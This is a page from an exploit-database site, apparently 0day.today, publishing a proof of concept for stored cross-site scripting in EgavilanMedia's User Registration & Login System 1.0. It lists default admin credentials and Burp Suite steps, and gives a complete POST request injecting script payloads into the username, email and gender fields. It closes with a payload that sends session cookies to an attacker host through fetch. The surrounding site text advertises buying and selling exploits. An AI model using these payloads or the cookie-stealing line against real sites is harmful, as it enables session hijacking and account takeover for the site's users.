0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored XSS Vulner
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting # Exploit Author: Mesut Cetin # Vendor Homepage: http://egavilanmedia.com # Version: 1.0 # Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34 Vulnerable parameter: email, gender, username Payload: <script>alert(document.cookie)</script> Proof of Concept: To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps: 1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php 2. Click above right on the "Profile" tab 3. Navigate to the "Edit Profile" tab 4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page. 5. Capture the POST request in Burp Suite and manipulate the parameter as shown: POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1 Host: demo.egavilanmedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 180 Origin: http://demo.egavilanmedia.com Connection: close Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e fullname=admin&username=<script>alert(document.cookie)</script>&email=<script>alert('PoC 2')</script>&gender==<script>alert('PoC 3')</script>&action=update_admin 6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like <BODY ONLOAD=fetch(`http://attackers-page.com/${document.cookie}`)>, the session cookies can be send to the attacker. # 0day.today [2024-07-05] #